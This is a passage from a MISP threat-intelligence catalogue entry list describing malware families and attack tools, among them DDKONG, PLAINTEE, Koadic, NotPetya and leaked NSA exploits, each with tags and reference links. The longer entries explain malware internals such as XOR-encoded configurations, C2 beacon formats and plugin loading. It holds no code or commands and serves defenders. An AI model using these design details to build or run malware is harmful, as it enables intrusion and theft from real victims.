The malware in question is configured with the following three exported functions: ServiceMain,Rundll32Call, DllEntryPoint. The ServiceMain exported function indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. If it’s not, it dies. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. After this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided, and as such, the length of this packet is set to zero. After it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported ‘InitAction’ function. If 0x6 is specified, the malware is instructed to load the exported ‘KernelDllCmdAction’ function. Prior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. As we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original malware family’s name, as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function. This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.

The tag is: misp-galaxy:tool="DDKONG"

DDKONG has relationships with:

  • similar: misp-galaxy:malpedia="DDKONG" with estimative-language:likelihood-probability="likely"

Table 16641. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

PLAINTEE

This sample is configured with three exported functions: Add, Sub, DllEntryPoint. The DLL expects the export named ‘Add’ to be used when initially loaded. When this function is executed PLAINTEE executes a command in a new process to add persistence. Next, the malware calls the ‘Sub’ function which begins by spawning a mutex named ‘microsoftfuckedupb’ to ensure only a single instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data. The malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet via XOR. This beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After the initial beacon, there is a two second delay in between all other requests made. This response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads, with different Command parameters, with the overall objective of loading and executing a new plugin that is to be received from the C2 server. During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample. PLAINTEE expects the downloaded plugin to be a DLL with an export function of either ‘shell’ or ‘file’. The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent. The following commands were observed: tasklist, ipconfig /all. The attacker performed these two commands 33 seconds apart. As automated commands are typically performed more quickly this indicates that they may have been sent manually by the attacker.

The tag is: misp-galaxy:tool="PLAINTEE"

PLAINTEE has relationships with:

  • similar: misp-galaxy:malpedia="PLAINTEE" with estimative-language:likelihood-probability="likely"

Table 16642. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host

The tag is: misp-galaxy:tool="Koadic"

Koadic has relationships with:

  • similar: misp-galaxy:malpedia="Koadic" with estimative-language:likelihood-probability="likely"

Table 16643. Table References

Links

https://github.com/zerosum0x0/koadic

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

Bisonal

In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. In 2013, both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations . In October 2017, AhnLab published a report called “Operation Bitter Biscuit,” an attack campaign against South Korea, Japan, India and Russia using Bisonal and its successors, Bioazih and Dexbia.

The tag is: misp-galaxy:tool="Bisonal"

Bisonal has relationships with:

  • similar: misp-galaxy:malpedia="Korlia" with estimative-language:likelihood-probability="likely"

Table 16644. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://camal.coseinc.com/publish/2013Bisonal.pdf

Sekur

Sekur has been CARBON SPIDER’s primary tool for several years, although usage over the last year appears to have declined. It contains all the functionality you would expect from a RAT, allowing the adversary to execute commands, manage the file system, manage processes, and collect data. In addition, it can record videos of victim sessions, log keystrokes, enable remote desktop, or install Ammyy Admin or VNC modules. From July 2014 on, samples were compiled with the capability to target Epicor POS systems and to collect credit card data.

The tag is: misp-galaxy:tool="Sekur"

Table 16645. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

Agent ORM

Agent ORM began circulating alongside Skeur in campaigns throughout the second half of 2015. The malware collects basic system information and is able to take screenshots of victim systems. It is used to download next-stage payloads when systems of interest are identified. It is strongly suspected that Agent ORM has been deprecated in favor of script-based first-stage implants (VB Flash, JS Flash, and Bateleur).

The tag is: misp-galaxy:tool="Agent ORM"

Agent ORM is also known as:

  • Tosliph

  • DRIFTPIN

Table 16646. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

VB Flash

VB Flash was first observed being deployed alongside Agent ORM in September 2015. It is likely that this was developed as a replacement to Agent ORM and contained similar capabilities. The first observed instance of VB Flash included comments and was easy to analyze—later versions soon began to integrate multiple layers of obfuscation. Several versions of VB Flash were developed including ones that utilized Google Forms, Google Macros, and Google Spreadsheets together to make a command-and-control (C2) channel. This variant would POST victim data to a specified Google form, then make a request to a Google macro script, receiving an address for a Google Spreadsheet from which to request commands.

The tag is: misp-galaxy:tool="VB Flash"

VB Flash is also known as:

  • HALFBAKED

VB Flash has relationships with:

  • similar: misp-galaxy:mitre-malware="HALFBAKED - S0151" with estimative-language:likelihood-probability="likely"

Table 16647. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

JS Flash

JS Flash capabilities closely resemble those of VB Flash and leverage interesting techniques in deployment via batch scripts embedded as OLE objects in malicious documents. Many iterations of JS Flash were observed being tested before deployment, containing minor changes to obfuscation and more complex additions, such as the ability to download TinyMet (a cutdown of the Metasploit Meterpreter payload). PowerShell was also used heavily for the execution of commands and arbitrary script execution. No JS Flash samples were observed being deployed after November 2017.

The tag is: misp-galaxy:tool="JS Flash"

JS Flash is also known as:

  • JavaScript variant of HALFBAKED

Table 16648. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

Bateleur

Bateleur deployments began not long after JS Flash and were also written in JavaScript. Deployments were more infrequent and testing was not observed. It is likely that Bateleur was run in parallel as an alternative tool and eventually replaced JS Flash as CARBON SPIDER’s first stage tool of choice. Although much simpler in design than JS Flash, all executing out of a single script with more basic obfuscation, Bateleur has a wealth of capabilities—including the ability to download arbitrary scripts and executables, deploy TinyMet, execute commands via PowerShell, deploy a credential stealer, and collect victim system information such as screenshots.

The tag is: misp-galaxy:tool="Bateleur"

Bateleur has relationships with:

  • similar: misp-galaxy:malpedia="Bateleur" with estimative-language:likelihood-probability="likely"

Table 16649. Table References

Links

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

JexBoss

A tool for testing and exploiting vulnerabilities in JBoss Application Servers.

The tag is: misp-galaxy:tool="JexBoss"

Table 16650. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

reGeorg

“Provides TCP tunneling over HTTP and bolts a SOCKS4/5 proxy on top of it, so, reGeorg is a fully-functional SOCKS proxy and gives ability to analyze target internal network.”

The tag is: misp-galaxy:tool="reGeorg"

reGeorg has relationships with:

  • similar: misp-galaxy:malpedia="reGeorg" with estimative-language:likelihood-probability="likely"

Table 16651. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

Hyena

An Active Directory and Windows system management software, which can be used for remote administration of servers and workstations.

The tag is: misp-galaxy:tool="Hyena"

Table 16652. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

csvde.exe

Imports and exports data from Active Directory Lightweight Directory Services (AD LDS) using files that store data in the comma-separated value (CSV) format.

The tag is: misp-galaxy:tool="csvde.exe"

Table 16653. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

NLBrute

A tool to brute-force Remote Desktop Protocol (RDP) passwords.

The tag is: misp-galaxy:tool="NLBrute"

Table 16654. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

xDedic RDP Patch

Used to create new RDP user accounts.

The tag is: misp-galaxy:tool="xDedic RDP Patch"

Table 16655. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

xDedic SysScan

Used to profile servers for potential sale on the dark net

The tag is: misp-galaxy:tool="xDedic SysScan"

Table 16656. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

Wmiexec

A PsExec-like tool, which executes commands through Windows Management Instrumentation (WMI).

The tag is: misp-galaxy:tool="Wmiexec"

Table 16657. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

RDPWrap

Allows a user to be logged in both locally and remotely at the same time.

The tag is: misp-galaxy:tool="RDPWrap"

Table 16658. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

PsExec

A light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. When a command is executed on a remote computer using PsExec, then the service PSEXESVC will be installed on that system, which means that an executable called psexesvc.exe will execute the commands.

The tag is: misp-galaxy:tool="PsExec"

PsExec has relationships with:

  • similar: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="likely"

Table 16659. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

PAExec

A PsExec-like tool, which lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. When the PAExec service is running on the remote computer, the name of the source system is added to service’s name, e.g., paexec-<id>-<source computer name>.exe, which can help to identify the entry point of the attack.

The tag is: misp-galaxy:tool="PAExec"

Table 16660. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

KEYMARBLE

This Malware Analysis Report (MAR) is the result of analytic efforts between Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant has been identified as KEYMARBLE. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity.

The tag is: misp-galaxy:tool="KEYMARBLE"

KEYMARBLE has relationships with:

  • similar: misp-galaxy:malpedia="KEYMARBLE" with estimative-language:likelihood-probability="likely"

Table 16661. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

BISKVIT

The BISKVIT Trojan is a multi-component malware written in C#. We dubbed this malware BISKVIT based on the namespaces used in the code, which contain the word “biscuit”. Unfortunately, there is already an existing unrelated malware called BISCUIT, so BISKVIT is used instead, which is the Russian translation of biscuit.

The tag is: misp-galaxy:tool="BISKVIT"

Table 16662. Table References

Links

https://www.fortinet.com/blog/threat-research/russian-army-exhibition-decoy-leads-to-new-biskvit-malware.html

Sirefef

This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including: -Downloading and running other files -Contacting remote hosts -Disabling security features Members of the family can also change search results, which can generate money for the hackers who use Sirefef.

The tag is: misp-galaxy:tool="Sirefef"

Sirefef is also known as:

  • Win32/Sirefef

Table 16663. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2Fsirefef

MagentoCore Malware

A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites. The script is what industry experts call a "payment card scraper" or "skimmer." Hackers breach sites and modify their source code to load the script along with its legitimate files. The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.

The tag is: misp-galaxy:tool="MagentoCore Malware"

Table 16664. Table References

Links

https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/

NotPetya

Threat actors deploy a tool, called NotPetya, with the purpose of encrypting data on victims' machines and rendering it unusable. The malware was spread through tax software that companies and individuals require for filing taxes in Ukraine. Australia, Estonia, Denmark, Lithuania, Ukraine, the United Kingdom, and the United States issued statements attributing NotPetya to Russian state-sponsored actors. In June 2018, the United States sanctioned Russian organizations believed to have assisted the Russian state-sponsored actors with the operation.

The tag is: misp-galaxy:tool="NotPetya"

NotPetya is also known as:

  • Not Petya

NotPetya has relationships with:

  • similar: misp-galaxy:ransomware="Bad Rabbit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"

Table 16665. Table References

Links

https://www.cfr.org/interactive/cyber-operations/notpetya

Xbash

Xbash is a malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed using Python and converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution. Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Linux based systems are targeted for ransomware and botnet capabilities. The ransomware targets and deletes linux databases and there is no evidence of any functionality that makes recovery even possible by payment the ransom. Where as, windows based systems are targeted for coinmining & self-propagating capabilities. Xbash spreads by attacking weak passwords and unpatched vulnerabilities.

The tag is: misp-galaxy:tool="Xbash"

Xbash has relationships with:

  • similar: misp-galaxy:malpedia="Xbash" with estimative-language:likelihood-probability="almost-certain"

Table 16666. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

LoJax

rootkit for the Unified Extensible Firmware Interface (UEFI). Used by APT28. The researchers named the rootkit LoJax, after the malicious samples of the LoJack anti-theft software that were discovered earlier this year.

The tag is: misp-galaxy:tool="LoJax"

LoJax has relationships with:

  • similar: misp-galaxy:malpedia="LoJax" with estimative-language:likelihood-probability="almost-certain"

Table 16667. Table References

Links

https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/

https://www.bleepingcomputer.com/news/security/lojax-command-and-control-domains-still-active/

Chainshot

The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.

The tag is: misp-galaxy:tool="Chainshot"

Chainshot has relationships with:

  • similar: misp-galaxy:malpedia="Chainshot" with estimative-language:likelihood-probability="almost-certain"

Table 16668. Table References

Links

https://www.bleepingcomputer.com/news/security/new-chainshot-malware-found-by-cracking-512-bit-rsa-key/

CroniX

The researchers named this campaign CroniX, a moniker that derives from the malware’s use of Cron to achieve persistence and Xhide to launch executables with fake process names. The cryptocurrency minted on victim’s computers is Monero (XMR), the coin of choice in cryptojacking activities. To make sure that rival activity does not revive, CroniX deletes the binaries of other cryptominers present on the system. Another action CroniX takes to establish supremacy on the machine is to check the names of the processes and kill those that swallow 60% of the CPU or more.

The tag is: misp-galaxy:tool="CroniX"

Table 16669. Table References

Links

https://www.bleepingcomputer.com/news/security/cronix-cryptominer-kills-rivals-to-reign-supreme/

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: misp-galaxy:tool="FASTCash"

FASTCash has relationships with:

  • similar: misp-galaxy:malpedia="FastCash" with estimative-language:likelihood-probability="almost-certain"

Zebrocy

Zebrocy is a tool used by APT28, which has been observed since late 2015. The communications module used by Zebrocy transmits using HTTP. The implant has key logging and file exfiltration functionality and utilises a file collection capability that identifies files with particular extensions.

The tag is: misp-galaxy:tool="Zebrocy"

Zebrocy is also known as:

  • Zekapab

Zebrocy has relationships with:

  • similar: misp-galaxy:malpedia="Zebrocy" with estimative-language:likelihood-probability="almost-certain"

Table 16670. Table References

Links

https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28

CoalaBot

The tag is: misp-galaxy:tool="CoalaBot"

CoalaBot has relationships with:

  • similar: misp-galaxy:malpedia="CoalaBot" with estimative-language:likelihood-probability="almost-certain"

Table 16671. Table References

Links

https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html

DanderSpritz

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar. For DanderSpritz works for a larger range of backdoors, using PeedleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.

The tag is: misp-galaxy:tool="DanderSpritz"

DanderSpritz is also known as:

  • Dander Spritz

Table 16672. Table References

Links

https://securelist.com/darkpulsar/88199/

DarkPulsar

DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

The tag is: misp-galaxy:tool="DarkPulsar"

DarkPulsar is also known as:

  • Dark Pulsar

DarkPulsar has relationships with:

  • similar: misp-galaxy:malpedia="DarkPulsar" with estimative-language:likelihood-probability="almost-certain"

Table 16673. Table References

Links

https://securelist.com/darkpulsar/88199/

EASYFUN

EasyFun 2.2.0 Exploit for WDaemon / IIS MDaemon/WorldClient pre 9.5.6 WordClient / IIS6.0 exploit

The tag is: misp-galaxy:tool="EASYFUN"

Table 16674. Table References

Links

https://github.com/misterch0c/shadowbroker

ETCETERABLUE

an exploit for IMail 7.04 to 8.05

The tag is: misp-galaxy:tool="ETCETERABLUE"

Table 16675. Table References

Links

https://github.com/misterch0c/shadowbroker

EXPIREDPAYCHECK

IIS6 exploit

The tag is: misp-galaxy:tool="EXPIREDPAYCHECK"

Table 16676. Table References

Links

https://github.com/misterch0c/shadowbroker

EAGERLEVER

NBT/SMB exploit for Windows NT4.0, 2000, XP SP1 & SP2, 2003 SP1 & Base Release

The tag is: misp-galaxy:tool="EAGERLEVER"

Table 16677. Table References

Links

https://github.com/misterch0c/shadowbroker

ESSAYKEYNOTE

The tag is: misp-galaxy:tool="ESSAYKEYNOTE"

Table 16678. Table References

Links

https://github.com/misterch0c/shadowbroker

EVADEFRED

The tag is: misp-galaxy:tool="EVADEFRED"

Table 16679. Table References

Links

https://github.com/misterch0c/shadowbroker

NAMEDPIPETOUCH

Utility to test for a predefined list of named pipes, mostly AV detection. User can add checks for custom named pipes.

The tag is: misp-galaxy:tool="NAMEDPIPETOUCH"

Table 16680. Table References

Links

https://github.com/misterch0c/shadowbroker

GhostMiner

GhostMiner is a new cryptocurrency mining malware. By the end of March 2018, a new variant of mining malware was detected targeting MSSQL, phpMyAdmin, and Oracle WebLogic servers. The sample uses Powershell to execute code with volatile resources and scans the server’s processes to detect and stop other miners that might have been running prior to execution. The fileless malware has become more popular in the last years. The malicious code runs directly in main memory without writing any file on disk, where an antivirus engine could detect it.

The tag is: misp-galaxy:tool="GhostMiner"

GhostMiner has relationships with:

  • similar: misp-galaxy:malpedia="GhostMiner" with estimative-language:likelihood-probability="almost-certain"

Table 16681. Table References

Links

https://www.alienvault.com/forums/discussion/17301/alienvault-labs-threat-intelligence-update-for-usm-anywhere-march-25-march-31-2018

August

August contains stealing functionality targeting credentials and sensitive documents from the infected computer.

The tag is: misp-galaxy:tool="August"

August is also known as:

  • August Stealer

Table 16682. Table References

Links

https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

China Chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

The tag is: misp-galaxy:tool="China Chopper"

Table 16683. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

PNG Dropper

The PNG_dropper family primarily uses a modified version of the publicly available tool JPEGView.exe (version 1.0.32.1 – both x86 and x64 bit versions). Carbon Black Threat Research also observed where PNG_dropper malware was seen compiled into a modified version of the 7-Zip File Manager Utility (version 9.36.0.0 – x64 bit).

The tag is: misp-galaxy:tool="PNG Dropper"

PNG Dropper is also known as:

  • PNG_Dropper

  • PNGDropper

Table 16684. Table References

Links

https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

Rotexy

A mobile spyware that turned into a banking trojan with ransomware capabilities managed to launch over 70,000 attacks in the course of just three months.

The tag is: misp-galaxy:tool="Rotexy"

Rotexy is also known as:

  • SMSThief

Table 16685. Table References

Links

https://www.bleepingcomputer.com/news/security/rotexy-mobile-trojan-launches-70k-attacks-in-three-months/

KingMiner

A recently discovered cryptomining operation forces access to Windows servers to use their CPU cycles for mining Monero coins. Detected six months ago, the activity went through multiple stages of evolution. Since it was spotted in mid-June, the malware received two updates and the number of attacks keeps increasing. The researchers at CheckPoint analyzed the new threat and gave it the name KingMiner. They found that it targets Microsoft IIS and SQL Servers in particular and runs a brute-force attack to gain access. Once in, the malware determines the CPU architecture and checks for older versions of itself to remove them.

The tag is: misp-galaxy:tool="KingMiner"

KingMiner has relationships with:

  • similar: misp-galaxy:malpedia="Kingminer" with estimative-language:likelihood-probability="almost-certain"

Table 16686. Table References

Links

https://www.bleepingcomputer.com/news/security/new-kingminer-threat-shows-cryptominer-evolution/

Taurus

Toolkit - building kit for crafting documents used to deliver attacks

The tag is: misp-galaxy:tool="Taurus"

Table 16687. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

SpicyOmelette

In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette.

The tag is: misp-galaxy:tool="SpicyOmelette"

Table 16689. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

LamePyre

When LamePyre runs on the system, users see the generic Automator icon in the menu bar, which is typical for any script of this sort. The script decodes a payload written in Python and runs it on the victim host. It then starts to take pictures and upload them to the attacker’s command and control (C2) server.

The tag is: misp-galaxy:tool="LamePyre"

LamePyre is also known as:

  • OSX.LamePyre

Table 16690. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

DarthMiner

The tag is: misp-galaxy:tool="DarthMiner"

DarthMiner has relationships with:

  • similar: misp-galaxy:malpedia="DarthMiner" with estimative-language:likelihood-probability="almost-certain"

Table 16691. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

OSX.BadWord

The tag is: misp-galaxy:tool="OSX.BadWord"

Table 16692. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

OSX/Shlayer

The initial Trojan horse infection (the fake Flash Player installer) component of OSX/Shlayer leverages shell scripts to download additional malware or adware onto the infected system. The primary goal of OSX/Shlayer is to download and install adware onto an infected Mac. Although "adware" may not sound like a big deal, it can be a lot more harmful than the name implies; be sure to watch our aforementioned interview with Amit Serper to learn more about one particular example of malicious Mac adware. At least one variant of the malware also appears to exhibit an interesting behavior: It checks whether one of several Mac anti-virus products is installed.

The tag is: misp-galaxy:tool="OSX/Shlayer"

Table 16693. Table References

Links

https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/

ANEL

Backdoor

The tag is: misp-galaxy:tool="ANEL"

ANEL is also known as:

  • UPPERCUT

ANEL has relationships with:

  • similar: misp-galaxy:malpedia="Anel" with estimative-language:likelihood-probability="almost-certain"

Table 16695. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

BabyShark

BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator.

The tag is: misp-galaxy:tool="BabyShark"

BabyShark has relationships with:

  • similar: misp-galaxy:malpedia="BabyShark" with estimative-language:likelihood-probability="almost-certain"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="likely"

Table 16696. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

StealthWorker

Hackers are running a new campaign which drops the StealthWorker brute-force malware on Windows and Linux machines that end up being used to brute force other computers in a series of distributed brute force attacks. As unearthed by FortiGuard Labs' Rommel Joven, the StealthWorker Golang-based brute forcer (also known as GoBrut) discovered by Malwarebytes at the end of February is actively being used to target and compromise multiple platforms. StealthWorker was previously connected to a number of compromised Magento-powered e-commerce websites on which attackers infiltrated skimmers designed to exfiltrate both payment and personal information. As later discovered, the malware is capable of exploiting a number of vulnerabilities in to infiltrate Magento, phpMyAdmin, and cPanel Content Management Systems (CMSs), as well as brute force its way in if everything else fails.

The tag is: misp-galaxy:tool="StealthWorker"

Table 16697. Table References

Links

https://www.bleepingcomputer.com/news/security/stealthworker-malware-uses-windows-linux-bots-to-hack-websites/

SLUB Backdoor

The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication).

The tag is: misp-galaxy:tool="SLUB Backdoor"

SLUB Backdoor has relationships with:

  • similar: misp-galaxy:backdoor="SLUB" with estimative-language:likelihood-probability="likely"

Table 16698. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/

Carp Downloader

In 2017, Unit 42 reported on and analyzed a low-volume malware family called Cardinal RAT. This malware family had remained undetected for over two years and was delivered via a unique downloader named Carp Downloader.

The tag is: misp-galaxy:tool="Carp Downloader"

Table 16699. Table References

Links

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

EVILNUM

EVILNUM is a JavaScript-based malware family that is used in attacks against similar organizations.

The tag is: misp-galaxy:tool="EVILNUM"

EVILNUM has relationships with:

  • similar: misp-galaxy:rat="Cardinal" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Cardinal RAT" with estimative-language:likelihood-probability="likely"

Table 16700. Table References

Links

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

Brushaloader

Brushaloader also leverages a combination of VBScript and PowerShell to create a Remote Access Trojan (RAT) that allows persistent command execution on infected systems.

The tag is: misp-galaxy:tool="Brushaloader"

Brushaloader has relationships with:

  • similar: misp-galaxy:malpedia="BrushaLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16701. Table References

Links

https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html

Karkoff

In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff.

